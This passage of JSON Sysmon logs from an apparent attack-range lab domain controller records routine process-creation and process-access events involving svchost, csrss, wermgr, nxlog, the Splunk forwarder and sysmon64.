06:52:00.243","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2264","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1110-5F25-0000-001057F70500}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.243\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1110-5F25-0000-001057F70500}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.243","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1110-5F25-0000-001057F70500}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4169,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.431\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.431","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4170,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.463\r\nProcessGuid: {E2A3D6B1-1110-5F25-0000-001014F80500}\r\nProcessId: 3800\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.463","ProcessGuid":"{E2A3D6B1-1110-5F25-0000-001014F80500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4171,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1110-5F25-0000-001014F80500}\r\nTargetProcessId: 3800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1110-5F25-0000-001014F80500}","TargetProcessId":"3800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1110-5F25-0000-001014F80500}\r\nTargetProcessId: 3800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1110-5F25-0000-001014F80500}","TargetProcessId":"3800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:00.462\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:00.462","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
